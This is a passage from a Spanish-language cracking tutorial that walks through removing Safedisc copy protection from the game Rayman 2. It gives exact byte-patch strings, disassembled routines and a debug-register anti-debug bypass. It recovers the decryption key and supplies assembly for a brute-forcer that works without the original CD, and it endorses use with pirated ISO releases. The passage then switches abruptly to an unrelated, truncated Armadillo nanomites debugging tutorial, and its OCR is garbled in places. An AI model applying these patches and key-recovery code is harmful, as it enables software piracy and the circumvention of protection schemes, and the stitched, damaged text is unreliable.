guna comprobación de CD en torno a 405628 (el resultado no importa ya que la protección está 
crackeada). No se necesita modificar nada para que la protección esté totalmente quitada, pero 
podéis eliminar el acceso si queréis. 

Es más fácil lo que hicimos, ¿no?. 


La comprobación de registro de debug 


Como os dije, la protección comprueba el contenido del registro de debug dr2 en nuestro ejemplo. No es ne- 
cesario quitar esta comprobación ya que creo que hay un bug en ella. :-) 


No obstante, recuerdo perfectamente que otras versiones de Safedisc usan una protección similar, pero se 
chequeaba dr7 en lugar de dr2. La comprobación dr7 es muy problemática ya que no podéis usar ningún brea- 
kpoint. Las protecciones futuras pueden utilizar la comprobación dr7 de nuevo, por lo tanto pienso que es 
relevante explicar cómo quitarla. 


Los ocho registros de debug controlan las operaciones de debug del procesador. Esos registros 
pueden ser escritos y leídos usando la forma del registro de debug "mover a" o "desde" de la 
instrucción mov. Un registro de debug puede ser el operando fuente o destino para una de esas 
instrucciones. Los registros de debug son recursos privilegiados; una instrucción mov que ac- 
cede a esos registros sólo puede ser ejecutada en modo de dirección-real, en smm, o en modo 
protegido en un cpl de O. Un intento de leer o escribir registros de debug desde algún otro nivel 
privilegiado genera una excepción general de protección (4GP). 
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Ya que el programa se ejecuta en 3, y no hay VXD, los programadores usan un truco muy inteligente (sí, ¡a 
veces los programadores de protecciones son inteligentes!) para cambiar a valor 0: cambian el handler de 
división entre O y cumplen una división entre O. Cuando están sin el handler, están ejecutándose en valor 0, 
activándolos para comprobar los registros de debug ... 


Ahora debemos localizar el acceso a los registros de debug, ¡y es muy fácil!. Como expliqué en la última cita, 
a los registros de debug sólo se puede acceder con la ayuda de una instrucción mov. 

Y una instrucción mov 132, dr0-dr7 siempre es ensamblada como OF 21 xx. Mirad las tablas para determinar 
el valor de xx. 


Estructura opcode 


Registros debug Registros generales 


register [yv yly registel 2 
DAU D/0/0U0 eax DIDJOU 
DAL 0/0|1 ecx 0|UJ|1 
pn2 0|1|0 edx D|1j0 
DA3 01|11|1 ebx 0 laz 
DHá 11010 esp 110/10 
DHS 110: 1 ebp 1|0]/1 
DH6G 1|1j/0 esi 1 1 1:] 0 
DR7 Ehud] d edi > 8 Mo BA 


Tabla 3.1: Tercer formato opcode para registros de debug mover a/desde 


En nuestro ejemplo, mov eax, dr2 es ensamblado Of 21 d0 (d0 = 11010000). Si buscáis esta corta cadena en 
rayman2.exe, encontraréis sólo la primera. Cambiad Of por CC y redireccionar la int 3 a Softice (¡3aquí en o 
bpint 3). De esta forma apareceréis en la rutina de comprobación dr2. 


pusha 

mov [ebp+var_1C] , cs 

si dt [ebp+var_14] 

mov eax , dword ptr [ebp+var_14+2] 
mov esi , [eax +4] 

mov si, [eax] 

mov edi, [esi] 

mov [ebp+var_4] , edi 

mov edi, [esi +4] 

mov [ebp+var_8] , edi 

mov dword ptr [esi +1], 0 CFS30E58h 
mov byte ptr [esi] , 58 h 


lea ebx , divO_handler ; mirad, cambiamos el handler... 
xor eax , eax 
div eax ; divide entre cero... 


divO_handler : ; DATA XREF: dr2_comprobación +1BA 
mov eax , [bp+read_write_dr2] ; estamos en valor 0... 
cmp eax, 1 

jz corto escribe_a_dr2 ; ¿leeremos o escribiremos a dr2? 
mov eax , dr2 ; leemos desde dr2 

mov [ebp+dr2_content] , eax 

jmp corto divO_quita 


escribe_a_dr2 : ; CODE XREF: dr2_comprobación +1CA 
mov eax , [ebp+dr2_contenido] 
mov dr2 , eax ; escribimos a dr2 


divO_quita :; CODE XREF: dr2_comprobación +1D2 
si dt [ebp+var_14] 

mov eax , dword ptr [ebp+var_14+2] 

mov esi , [eax +4] 

mov si, [eax ] 

mov dword ptr [esi +1], 0 CF535158h 

mov byte ptr [esi] , 58 h 

XOr €CX , ecx 

mov cx , [ebp+var_1C] 

lea ebx , divO_puntodesalida ; estableciendo punto de salida... 
xor eax , eax 

div eax 


divO_puntodesalida : ; DATA XREF: dr2_comprobación +1F7 
mov edi, [ebp+var_4] ; estamos de vuelta en 3 de nuevo 

mov [esi], edi 

mov edi, [ebp+var_8] 

mov [esi +4], edi 

popa 

cmp [ebp+escribe_lee_dr2] , 0 

jnz corto dr2_loque_escribí ; si escribí a dr2, entonces lo quito 
mov eax , [ebp+p_dr2_contenido] 

mov ecx , [ebp+dr2_contenido] 

mov [eax] , ecx ; aquí guardamos el valor de dr2 


Por supuesto, dr2 contendrá valor 0, y lo hace, incluso usándolo sin Softice (escribid cpu para saber el valor 
de los registros). ¡Esto es por lo que considero que esta protección tiene un bug!. 

A menos que no haya comprendido algo... si encontráis una comprobación dr7 en lugar de una comprobación 
dr2, el valor esperado para dr7 es 400, no 0. 


Importante: siempre que encontréis una comprobación dr7, es la primera protección que de- 
beríais quitar. 


No hay necesidad de quitar la comprobación dr2 en nuestro caso ya que la función que la llama ya ha sido 
modificada o no llamada en absoluto gracias a nuestras modificaciones previas. De todas formas, para hacerlo 
tendríais que buscar la cadena 8b 4d e8 89 y cambiarla por c7 00 00 00 00 00 33 c0 40. 


Ahora rayman2.exe está totalmente desprotegido, y creo que es hora de que nos tomemos un descanso. ¿Qué 
os parece el juego de Unreal Tournament?. Muy relajante. ¿Quizá preferiríais comer algo o tomaros un trago?. 


Vuestro cerebro probablemente necesite glucosa ahora (especialmente si el inglés no es vuestra lengua natu- 
ral), incluso un zumo de frutas o algunas galletas pueden ser una buena idea. No recomiendo brebajes alcohó- 
licos, al contrario de lo que sentís, vuestras capacidades decrecen. Incluso podéis parar por ahora, y reasumir 
la lectura otro día. 


Por supuesto, si domináis el viejísimo arte de la meditación, el momento es ideal. 


Si lo preferís, podéis continuar leyendo este documento, pero realmente os recomiendo tomarse un descanso 
para tomar una ventaja total sobre lo que acabáis de aprender. 


3.1.5 Desprotegiendo dplayerx.dll 


Esta es la última cosa que debemos hacer, una vez hecho, la protección Safedisc dejará de existir. 
Dplayerx.dll se cuida de descifrar el archivo ICD con la ayuda de la llave extraída del CD (realmente sectores 
malos). Incluso interfiere el .rdata modificado con el sistema. 

De hecho, en lugar de acceder directamente a la función de sistema, el programa va a través de dplayerx.dll el 
cual lo redirecciona a la dirección correcta. 


Esto es porque, en otros tutoriales tenéis que reconstruir la sección .rdata manualmente, lo cual produce a 
veces cracks poco dignos. El verdadero quid de mi método está aquí, modificaremos dplayerx.dll, porque aún 
interfiere las funciones de sistema, incluso si no hay en absoluto un CD en el lector. 


De todos modos, recordaréis que reconstruimos el archivo ICD. ¿Por qué? Simplemente porque descodificar 
el ICD es lento. Incluso modificaremos dplayerx.dll para que no descifre el ICD nunca más. 


La salida .txt 


Podéis proceder del mismo modo que hicimos para rayman2.exe, ya que es el mismo tipo de rutina, excepto 
que están localizadas en dplayerx.dll.txt2 esta vez. Todo lo que tenéis que hacer, es seguir el mismo procedi- 
miento y súbitamente encontraréis esta llamada: 


mov [eax +4], edx 

mov ecx , [ebp+arg_8] 

mov [eax +8], ecx 

call cerca ptr a_w_comprobación_3 ; aquí descodificamos... 
add esp , 28 h 

jmp corto loc_8F9564 


Quitad esta tontería (¿pero encontrarlo no lo fue, verdad? ;-)). Buscad eS 90 00 00 y reemplazarlo por eb 03. 
Registros de Debug 

Es exactamente la misma rutina que comprueba el contenido de dr2 en dplayerx.dll. Como dije, no gastéis 
vuestro tiempo con eso: es ineficiente. De todos modos, deberíais encarar una comprobación dr7, deberíais 
actuar como os expliqué previamente en este caso. 

Cambiando la conducta de dplayerx.dll 

Para acelerar la carga, construiremos un archivo ICD con las secciones descodificadas .data y .texto. Por su- 


puesto, dplayerx.dll intentará descifrarlos de todos modos, incluso cuando ejecutéis rayman2.icd, no tendréis 
el código limpio nunca más. 


Lo que tenéis que hacer, es quitar la llamada a la función que cuida el proceso entero de descodificado. Una 
labor fácil, para detectarlo sólo tenéis que tracear desde el punto de entrada de la dll, y monitorear el conteni- 
do de rayman2.icd.text. Rápidamente encontraréis que este trozo de código es interesante: 


call ds : GetCurrentProcess 

push offset dword_905030 

mov dword_909740 , eax 

call sub_8FSBBA 

add esp, 4 

mov dword_909744., eax 

push 1 

push offset dword_909740 

call descifrador ; esta función hace la cosa entera 


Avanzando dentro del descifrador, finalmente alcanzaréis este trozo de código: 


mov eax , esp 

mov [eax] , ecx 

mov ecx , dword_908980 
mov [eax +4], edx 

mov [eax +8], ecx 


loc_8F40BO : ; CODE XREF: whole_ICD_ stufft+20EC 
call sección descifrador ; aquí desciframos secciones 
add esp, 0 Ch 

jmp corto loc_8F40C1 


Veréis más tarde, cuando estudiemos cómo crackear sin el CD, que el corazón de Safedisc yace profundo en 
esta función. Por ahora, pese a todo, todo lo que necesitamos es quitar la llamada. 

Todo lo que haremos es saltar sobre el código, ¿pero hacia dónde?. Si saltáis justo después se colgará porque 
estamos dentro de un loop. 


Pero ¿sabemos donde se sitúa el proceso entero .rdata?. No, no lo sabemos. Ejecutad rayman2.exe con fallos 
activados (faults on), rápidamente os encontraréis en dplayerx.dll, cerca de este código: 


loc_8F1AF9 : ; CODE XREF: crear_api_interface +738 
mov ecx , [ebp+llave] ; almacenar la llave en ecx 

mov edx , [ebp+rdata_valor] ; edx contiene un valor 

; from . rdata 

xor edx , [ecx] 


loc_8F1B01 : ; CODE XREEF: crear_api_interface +7CB 

add edx , [ebp+base_call] 

mov [ebp-+rdata_valor] , edx ; también reconstruimos la rdata en la memoria temporal 
mov eax , [ebp+rdata_valor] 

XOr €cx , ecx 

mov cx , [eax] ; aquí tenéis un fallo general de protección 

and ecx , O EFh 

push ecx 

mov edx , [ebp+rdata_valor] 


loc_8F1B19 : ; CODE XREF: crear_api_interface +7BC 


add edx, 2 

push edx 

mov eax , [ebp+var_8] 
push eax 

call alloc_api_interface 


El problema es que ecx contendrá la llave extraída del CD original (realmente "computada" es un término más 
preciso), ya que hemos hackeado la protección, la memoria contiene basura en lugar de la llave correcta, 
incluso el programa accede a un emplazamiento inválido de memoria. 


¿Cómo adivinar el valor correcto de la llave? Bien, es muy simple, no lo adivináis, lo robáis. Notad que la 
llave está almacenada en 909473. Si ponéis un breakpoint en este valor y ejecutáis el programa de nuevo 
(bpm 909473 W), ciertamente apareceréis aquí: 


store_llave proc cerca ; CODE XREF: crear_api_interface +4FD 


arg_0= dword ptr 8 
arg_4= word ptr O Ch 


push ebp 

mov ebp , esp 

mov eax , [ebp+arg_0] 

mov ecx , [eax] 

mov llave_backup , ecx ; aquí copiamos a 909473 
mov dx , [ebp+arg_4] 

mov word_909477 , dx 

pop ebp 

retn 


almacenado_llave endp 


Esto es perfecto. Todo lo que debéis hacer es deshabilitar todos los breakpoints excepto uno en 909473, mo- 
ved los archivos hackeados (rayman2.exe, dplayerx.dll y rayman2.icd) a otro lado y restaurad los archivos 
originales. Insertad el CD original, esperad que el programa aparezca y sonreid, el valor correcto de la llave 
debería estar en ecx. En nuestro caso, el valor es c15cf2e5. 


Cambiad el código para que cl15cf2e5 esté siempre almacenado en 909473, esquivará la comprobación. Para 
hacerlo, simplemente buscad 8B 45 08 8B 08 89 OD y cambiadlo por b9 eS f2 5c cl. Ahora el programa no se 
colgará nunca más con dplayerx.dll, ni con rayman2.icd. 


Sabemos por qué: esto es porque no hemos quitado la llamada a la función que descodifica las secciones de 
«texto y .data. Incluso sabemos que la función es llamada a la dirección 8f40b0. Todo lo que tenemos que 
hacer es saltar justo antes de la llamada a la función que mapea la API. 

Con IDA, si hacéis un scroll al partir de 8£40b0, encontraréis que este trozo de código es atractivo: 


loc_8F48E3 : ; CODE XREF: materia_ICD_entera +28B4 

mov ecx , [ebp +8] 

push ecx 

push offset llave_1 

call rdata_chks ; llamamos esta función una vez que el ICD está descifrado 
; prestará atención a la completa materia . rdata remapeada... 

add esp, 8 


Bien, ¿realmente tengo que deciros qué hacer?. En lugar de llamar la función, saltaremos directamente a 
8f48e3. Para hacer esto, buscad E8 EB 0D 00 y cambiadlo por 83 c4 Oc e9 2b 08 00 00. 


¿Listos para el test? Quitad el CD original del lector, aseguraos que la versión hackeada de rayman2.exe, 
dplayerx.dll y rayman2.icd están en el directorio principal, y ejecutad rayman2.exe... 
...enhorabuena, trabaja. Acabáis de crackear Safedisc. 


Por supuesto, el programa aún os pregunta por el CD, esto no es la protección Safedisc sino que la causa está 
en el mismo juego. Si insertáis una copia del CD, trabajará bien, porque las comprobaciones son mundanas. 


Quitar la no-protección de Safedisc de Rayman 2 es un asunto trivial, y no lo voy a discutir aquí. 


3.1.6 Generalización 


Aniquilamos Safedisc ¿no lo hicimos?. Lo que es mejor, es que no tendremos que preocuparnos por .rdata, 
q ¿ q ) q que p p p 
¡ya que será reconstruido como si el CD original estuviese presente!. 


Si intentáis este método en un juego Safedisc diferente, notaréis que dplayerx.dll y el ejecutable principal 
tienen el mismo tamaño (si no, esto significa ciertamente que es una versión diferente de safedisc). Incluso 
notaréis que las funciones de protección están localizadas en la misma posición. Crackearlo no debería llevar 
más de 10 minutos. 


Si encontráis una versión diferente de Safedisc, se probará que lo que aprendisteis aquí es útil, ya que es pro- 


bable que la protección sea muy parecida. Si seguís este método, deberíais ser capaces de derrotar cualquier 
futuro estreno de Safedisc. 


3.2 Trabajando sin el CD original 


Vuestro trabajo no será muy diferente excepto que 


e no podéis dumpear la sección .texto y .data rayman2.icd 
e no podéis robar la llave. 


3.2.1 Unas cuantas palabras sobre la protección 


Lo que sabéis, es que inspecciona el CD y busca los sectores malos. Más tarde con la ayuda de los sectores 
encontrados, computa una llave, la cual será usada para descodificar las secciones de rayman2.icd. Incluso 
notamos que la sección .rdata aún es dependiente de dplayerx.dll después de la operación esto es para hacer el 
crackeado más difícil. 


Necesitamos invertir el algoritmo de cifrado, e incluso necesitamos crear un crackeador de fuerza bruta. Lue- 


go, extraeremos la sección descodificada para obtener el mismo ICD que antes (veréis que es un proceso 
lento, incluso es mejor tener las secciones descifradas). 


3.2.2 Trabajando con el ejecutable principal 


Debéis seguir los mismos pasos para construir un rayman2.exe que funcione. Dumpead la sección .txt, re- 
construid el exe y quitad las protecciones. Si ya habéis hackeado rayman2.exe, no hay nada que hacer. 


3.2.3 Invirtiendo el algoritmo 


¿Recordáis este trozo de código? 


mov eax , esp 

mov [eax] , ecx 

mov ecx , dword_908980 
mov [eax +4], edx 

mov [eax +8], ecx 


loc_8F40BO0 : ; CODE XREF: entera ICD_materia +20EC 
call sección descifradora ; aquí desciframos secciones... 
add esp , O Ch 

jmp corto loc_8F40C1 


Como os dije, el corazón de Safedisc yace en la profundidad. Después de un montón de traceado y análisis de 
código, descubriréis que las secciones son descodificadas por bloques de tamaños de 4096 bytes, y que cada 
bloque se descodifica por bloques de tamaño de 8 bytes. Aquí está la descripción del algoritmo: 


descodificar_8bytes proc cerca 
; CODE XREF: descodificar_el_real +27 descodificar_el_real+8B ... 


para_descodificar= dword ptr 8 
llave= dword ptr OCh 


push ebp ; esta rutina descodifica 8 bytes 

mov ebp , esp 

mov eax , ds : rdata_0 ; los primeros 4 bytes de dplayerx.dll.rdata 
push ebx 

push esi 


loc_8F800A : 

mov esi , [ebp+para_descodificar] 

push edi 

mov edi, ds : rdata_4 ; los 4primeros bytes de dplayerx.dll.rdata 
mov edx , [esi] 

mov ecx , [esi +4] 

shl eax, 5 


[basura] 


mov ebx , edi 

dec edi 

test ebx , ebx 

jbe final_rutina 

mov esi , [ebp+llave] 
inc edi 

mov [ebp+llave] , edi 


comienza_loop : ; CODE XREF: descodifica_8bytes+C0 
mov ebx , [esi +8] ; hacemos loop 20 veces 

mov edi , edx 

shl edi, 4 

add edi , ebx 


mov ebx , edx 
shrebx,5 

add ebx , [esi +0Ch] 
xor edi , ebx 

lea ebx , [eax+edx] 
xor edi , ebx 

sub ecx , edi 


[basura] 


mov ebx , [esi +4] 
mov edi , ecx 

shr edi, 5 

add edi , ebx 

lea ebx , [eax+ecx] 
xor edi , ebx 

mov ebx , ecx 

shl ebx , 4 

add ebx , [esi] 

xor edi , ebx 

sub edx , edi 


[basura] 
sub eax , ds : rdata_0 
[basura] 


mov edi , [ebp+llave] 

dec edi 

mov [ebp+llave] , edi 

¡nz corto comienza_loop 

mov esi , [ebp+para_descodificar] 

final_rutina : ; CODE XREF: descodifica_8bytes +35 
mov [si], edx ; guardamos edx 


[basura] 
mov [esi +4], ecx ; guardamos ecx 
[basura] 


pop edi 

pop esi 

pop ebx 

pop ebp 

retn 

descodifica_8bytes endp 


El algoritmo ahora es desconocido para siempre. Hemos cifrado datos, hemos conocido el algoritmo, pero 
ignoramos la llave y no tenemos datos claros. Para forzar el algoritmo necesitamos adivinar datos claros, y 
podemos hacerlo. 


Al final de la sección .data deberíais ver este modelo CD DE 58 A2 75 01 7F que es repetido muchas veces. 
No se necesita un montón de conocimiento de PE para saber que las secciones .data acaban con 0, para ali- 
near propósitos. Luego, sabemos que CD DE 58 A2 75 01 7F corresponde a 00 00 00 00 00 00 00 00. 


Tenemos el algoritmo, texto claro y texto codificado. Podemos determinar ahora fácilmente la llave. Pero aún 
hay un problema, pasar de 00000000h a FFFFFFFFH llevará algún tiempo. 

Afortunadamente tenemos una forma de estrechar nuestra búsqueda. Ciertamente recordaréis que la sección . 
rdata se maneja de forma diferente, y que el algoritmo es muy diferente. Aquí está: 


loc_8F1AF9 : ; CODE XREF: crea_api_interface +738 
mov ecx , [ebp+llave] ; coloca la llave en ecx 

mov edx , [ebp+rdata_valor] ; (1) edx contiene un valor 
; from . rdata 

xor edx , [ecx] 


loc_8F1B01 : ; CODE XREF: crea_api_interface +7CB 
add edx , [ebp+base_call] ; edx contiene ahora el valor correcto 


Si tenéis cuidado, veréis que en el punto (1), edx siempre contiene algo como cl xx xx xx. Ya que este resul- 
tado es xoreado con el valor de la llave, y ya que no hay forma de que el resultado de la operación sea más 
grande que FFFFFFh, sabemos que los dos primeros bytes de la llave son cl (porque aSa = 0). Dividimos el 
número de posibilidades entre 256, esto implica que ¡el crack será 256 veces más rápido!. 


Tenéis que programar algo que intente encontrar la llave correcta. Aquí hay algún código fuente para ayudar- 
te: 


bruto_loop proc usos esi , addr : DWORD 
mov eax , comienza_valor 

; put c1000000 _ 1 en comienza_valor 
mov esi , addr 


bl_loop : 


inc eax 


jz bl_fin 


push eax 
push esi 


call descodifica_8bytes 


or ecx , edx 
jnz bl_loop 


bl fin: 
int 3 ; cuando estamos aquí, eax debería contener la llave correcta 


ret 


bruto_loop endp 
descodifica_8bytes proc usa ebp eax ebx esi edi , para_descodificar : DWORD, llave : DWORD 


; Optimiza la rutina original de safedisc un poquito 


; no sé si lo puedo hacer mejor 


mov esi , para_descodificar 

; para_descodicar debería apuntar a CD DE 58 A2 75 01 7F 
mov edx , [esi] 

mov ecx , [esi+4] 


mov eax , rdata_val ; poner los 4 primeros bytes de dplayerx.dll.rdata aquí 
shl eax, 5 


mov esi , llave 


mov ebp , cuántas_veces ; usamos ebp como contador 

; poner los 4 primeros bytes de dplayerx.dll.rdata en cuántas_veces 
test ebp , ebp 

jbe final_rutina 


comienza_loop : ; hacemos un loop 20h veces 
mov ebx , esi ; llave+8 
mov edi , edx 

shl edi, 4 

add edi , ebx 

mov ebx , edx 
shrebx,5 

add ebx , esi ; llave+C 
xor edi , ebx 

lea ebx , [eax+edx] 
xor edi , ebx 


sub ecx , edi 


mov ebx , esi ; llave+4 
mov edi , ecx 
shr edi, 5 


add edi , ebx 

lea ebx , [eax+ecx] 
xor edi , ebx 

mov ebx , ecx 

shl ebx , 4 

add ebx , esi ; llave+0 
xor edi , ebx 

sub edx , edi 

sub eax , rdata_val 


dec ebp 
jnz comienza_loop 


final_rutina: 
ret 


descodifica_8bytes endp 


Por supuesto que tenéis que añadir más para obtener un programa completo, pero la parte más dura está expli- 
cada aquí. Supongo que entendisteis que el algoritmo usa una llave de 32 bytes de largo, pero que esta llave 
realmente es 4 veces la misma llave de 8 bytes de largo. 


Después de un corto período, si vuestro programa funciona bien, deberíais encontrar la misma llave que antes: 
cl5cf2e5. 

3.2.4 Hackeando la dplayerx.dll 

Podéis seguir todos los mismos pasos para hackear dplayerx.dll, excepto que no deberíais quitar el descifrador 
ICD. Ahora se necesita para alterar la llave antes de que sea llamada esta función. 

Una tarea muy fácil, todo lo que tenéis que hacer, es poner un breakpoint en 8F40BO (bpx 8f40b0 cuando 
estéis dentro de dplayerx.dll). Cuando aparezcáis ahí, poned el comienzo de esos bytes en 908988 : eS 2f 55 
cl eS 2f 55 cl eS 2f 55 cl eS 2f 55 cl (ed ds:908988 c15cf2e5,c15cf2e5,c15cf2e5,c15cf2e5, después compro- 


bad con db ds:908988 que los bytes están en orden inverso.) 


Cuidado: estad seguros de que no tenéis breakpoints en rayman2.icd.text antes de empezar a 
hacerlo. 


Una vez que la memoria ha sido modificada, subid unos pasos sobre la llamada, ambas secciones están ahora 
descodificadas. Deberíais dumpearlas y reconstruir el archivo ICD. Una vez que esto esté hecho, todo lo que 
tenéis que hacer es hackear dplayerx.dll para que la sección .rdata sea descifrada correctamente. 


El resultado final debería ser el mismo que el que obtuvimos con el CD original. Testeadlo... 


... enhorabuena, ya habéis crackeado Safedisc sin el CD original. 

3.2.5 Crackeado minimalista 

Habéis aprendido cómo crackear sin el CD. ¿Cuáles son los archivos que necesitáis para crackear?. Aquí está 

la lista: 

1. rayman2.exe 

2. dplayerx.dll 

3. rayman2.icd 

Debería ser suficiente para crackear. :-) 
nota: si estás trabajando en IRC, con un lanzamiento ISO por ejemplo (¡bribón!), sólo necesitas 
estos tres archivos. De todas formas, si el proveedor puede dumpear las secciones para ti, por 


supuesto que es mejor. 


Los compañeros de Prestige me dijeron que el ISO completo fue transmitido a través de ftp 
crackeado. Intentad mi método... 


Capítulo 4 


Conclusión 


Pero la Muerte, ¡ay de mí! No puedo esquivarla; 
La Muerte debe venir cuando él se haya ido. 
“Dido 4 Aeneas” 


4.1 Safedisc se acabó 


Esta protección es obsoleta. No sólo el CD original puede ser copiado, sino que como os he enseñado, es 
posible crackear la protección con la ayuda de tres archivos. 


¡Y hay más que investigar!. No lo he intentado todavía, pero supongo que crackeando los drivers usados para 
leer los sectores malos del CD podría darnos buenos resultados también. Me temo, de todos modos, que la 
protección podría estar ciega en este punto (esto es, no se entera de qué debería encontrar). Incluso me temo 
que la modificación de las dll de los drivers podría ser detectada, lo que nos forzaría a hackear el ejecutable 
principal y dplayerx.dll, obteniendo una solución equivalente. 


¿Recordáis el crack de protección genérica de Safedisc de Pedro?. Simula sectores malos para enloquecer la 
protección, pero sólo trabaja con las revisiones más viejas de Safedisc. Supongo que si el crack está residente, 
no hay solución genérica para modificar la dll. 


Todo lo que he explicado aquí puede hacerse con el Black Check's brute forcer, excepto que el .rdata deberá 
ser reconstruido. Esto es 99% fiable, la única solución que es 100% fiable, en mi humilde opinión, es hackear 
dplayerx.dll como hicimos. 


El desempaquetador de R!SC también es una buena herramienta, pero no ha sido actualizado desde hace mu- 
cho tiempo hasta hoy en día, y necesita la presencia del CD original. El método usado es completamente dife- 
rente aquí, ya que dumpea los datos, no los descodifica. 


4.2 El futuro 


Estoy seguro de que Safedisc continuará sacando nuevas versiones de Safedisc (al menos hasta que los pro- 
gramadores se den cuenta de que están perdiendo su dinero), y continuaré invirtiéndolos. 


Por ahora bien, tengo Unreal Tournament para jugar, usa incluso una versión más reciente de Safedisc. ¡Las 
versiones futuras de este ensayo incluirán los resultados de mis investigaciones! (y también correcciones, 


supongo :-)). 


De todos modos, dudo que ocurran mayores cambios, incluso si domináis las técnicas descritas, deberíais ser 
capaces de crackear futuras versiones de Safedisc. 


Lo que espero que cambie: 


Algunos cambios en el algoritmo descifrado (encontrad el nuevo e invertidlo). 

Nuevos trucos anti-debug (usad Frogsice y vuestro cerebro, recordad los registros de debugueo). 
Más comprobaciones (bpm es vuestro amigo). 

Algunas reorganizaciones con el código (analizad el código con IDA). 


Como podéis ver, no os cogerán realmente de sorpresa... 


4.3 Las protecciones de CD de confianza no existen 


Es imposible crear una protección de confianza de CD en un PC, ya que el hardware es genérico. 
Incluso, podéis poner sólo la protección que los drivers del CD son capaces de leer, y si son capaces de leerla, 
podéis copiarla. 


En el peor de los casos, lo mejor que pueden hacer los creadores de protecciones es esconder el código de 
protección, pero no pueden quitarlo. De hecho, en un momento u otro, el ejecutable debe ser descifrado en la 
memoria para poder ser ejecutado. También, las rutinas de comprobación son código que es ejecutado, como 
os mostré, es posible evitarlo. 


La seguridad es equivalente a una puerta muy sólida, pero con la llave escondida cerca... 


72:ARMADILLO MAS NANOMYTES SEGUNDA PARTE 


Bueno aquí estamos con la segunda parte de los nanomites de armadillo, en el cual 
usaremos un método automático realizando un injerto en el hijo que lo arreglara casi 
totalmente, ya que los saltos los cuales los nanomites reemplazan, son casi todos cortos 
(en este programa son TODOS saltos cortos menos uno solo que es un salto largo) 
solucionando automáticamente los saltos cortos el programa queda prácticamente 
solucionado quedando para corregir el salto largo a mano que es uno solo y ya funciona 
100%. 

Lo primero que haremos será en el programa eStop en el PADRE, colocaremos varios 
Breakpoint condicional LOG para que nos de una lista que bajaremos a un archivo de 
texto con LOG TO FILE, y allí tendremos una visión mejor para el injerto que luego 
realizaremos. 

Otra cosa que debemos saber es que la TABLA 1, todas las posiciones de memoria que 
están en la misma no son todos nanomites, ya que los CC que el programa armadillo 
encuentra los pone en dicha tabla, y no todos son INT3 o nanomites ya que puede ser 
por ejemplo. 

Mov eax, [ebp+CC] 


en el cual hay un CC en el medio de la sentencia que obvio no es un nanomite así que 
nuestro injerto debe tratar de saltear estos falsos nanomites que están en la TABLA 1. 
Pero antes arranquemos el padre con un 00 en el antidebugger y pongamos un BPX en 
el inicio de la rutina de los nanomites en 

1ER CONDICIONAL LOG 

005SC5BBC . 33C0 XOR EAX,EAX 

Corramos el programa y la segunda vez que para allí, quitemos el BPX y pongamos un 


BREAKPOINT CONDITIONAL LOG así configurado vació, para que haga un espacio 
entre los datos de uno y otra entrada. 


Modify conditional log breakpoint at eSTOP.005C5BBC 


sl pl 
as 


Explanatior: Expression: 


Decode value of expression as: [Assumed by expression he 


Never On condition Always 
Pause program: 1 
Log value of expression: $6 


Log function arguments: E 


Bueno el siguiente dato que pondremos en el log son los valores donde se encuentran 
los INT3 y eso como vimos en la parte 1 luego de la llamada a GetThreadContext esa 
api devuelve la posición siguiente adonde paro por INT3, o sea que si le restamos uno, 
tendremos la posición exacta, del INT3 en el hijo y en el dumpeado lógicamente. 


005C5E49 — FF15 84E05D00 CALL DWORD PTR DS:[<8£KERNEL32.GetThreadC>; IGetThreadContext 


005C5E4F  8B95 EOF3FFFF MOV EDX,DWORD PTR SS:[EBP-C20] 
005C5SES5 8995 24F3FFFF MOV DWORD PTR SS:[EBP-CDC],EDX 


Por eso como luego de la api mueve a EDX el valor de la ubicación del INT3 mas 1 
entonces para el valor correcto colocamos en 5C5E5S5 el breakpoint conditional log 
configurado así. 


2D0 CONDITIONAL LOG 


005C5E55 — 8995 24F3FFFF MOV DWORD PTR SS:[EBP-CDC],EDX 


Modify conditional log breakpoint at eSTOP.005C5E55 
Condition: 
Explanation: Expression: 


| y] = [edx-1 y] 


Decode value of expression as: [Assumed by expression En 


Never On condition Always 
Pause program: (e 
Log value of expression: > 


Log function arguments: ES 


Bueno ya tenemos la posición del nanomite ahora sigamos con los datos 
Luego pondremos el tipo de salto según la TABLA 2 


005CSEE7>. 51 PUSH ECX : |Argl 
005CSEES . E8 EE150000 CALL eSTOP.005C74DB : leSTOP.005C74DB 


Allí en ECX esta el tipo de salto así que pongamos otro BREAKPOINT 
CONDITIONAL LOG en 5C5EE?7. 


3ER CONDITIONAL LOG 


005CSEE7>. 51 PUSH ECX : Argl 


Modify conditional log breakpoint at eSTOP.005C5EE7 


Condition: 
Explanation: Expression: 


[Tipo de Salto al = [ECx y] 


Decode value of expression as: [Assumed by expression al 


Never Dn condition Always 
Pause program: (e o 
Log value of expression: 2 


Log function arguments: ES 


Lo configuramos para que muestre ECX que tiene el valor del tipo de salto de la 
TABLA 2 


Luego al salir del CALL según sea EAX es CERO no salta y si EAX=1 salta es una 
información muy útil así que el próximo salto condicional lo pondremos allí 


4T0 CONDITIONAL LOG 


005C5EFS >. 85C0 TEST EAX,EAX 


Modify conditional log breakpoint at eSTOP.00O5C5EF5 


Condition: 


Explanation: Expression: 


["SALTA 1 no SALTA O" y] 5 [eax y] 
Decode value of expression as: [Assumed by expression y] 


Never On condition Always 


Pause program: aj o 


Log value of expression: E 


Log function arguments: Ey 


Luego nos falta la información del segundo byte del salto siempre que sea un salto corto 
y eso lo podemos configurar en 


STO CONDITIONAL LOG 
005C5F0D . 898D EO0F3FFFF MOV DWORD PTR SS:[EBP-C20],ECX 


aquí en ECX esta el valor donde saltaría, si se efectúa el salto, así que es muy útil este 
dato 


Modify conditional log breakpoint at eSTOP.005C5FO0D 
Condition: 
Explanation: Expression: 


[Saltara a E al = [Ex y] 


Decode value of expression as: [Assumed by expression y] 


Never Dn condition Always 
Pause program: (e o 
Log value of expression: e 


Log function arguments: $ 


6TO CONDITIONAL LOG 


Cuando el salto no se efectúa es muy importante saber donde saltaría si se hubiera 
efectuado así que esto lo configuramos en 


005C5F1B >. 0395 20F3FFFF ADD EDX,DWORD PTR SS:[EBP-CEO] 


Modify conditional log breakpoint at eSTOP.005C5F1B 


Condition: Ñ 


Explanation: Expression: 


[Saltaria JAN y] = | [3e6870+4*[ebp-OceD]]+ dword [ebp-0c20] y 
Decode value of expression as: [Assumed by expression y] 


Never Dn condition Always 


Pause program: (e e 


Log value of expression: 9 


Log function arguments: e 


Aquí 3E6870_debe ser el inicio de la tabla 3 que marca donde saltarían si se efectúan 
los saltos. 

En lugar de 3E6870 cada uno debe poner el inicio de la TABLA 3 que nos dice la 
distancia a donde saltan los saltos que si se efectúan. 


Bueno con esto podemos sacar un LOG completo de la mayoría de los nanomites así 
que vayamos a la ventana LOG y hagamos click derecho LOG TO FILE y elijamos un 
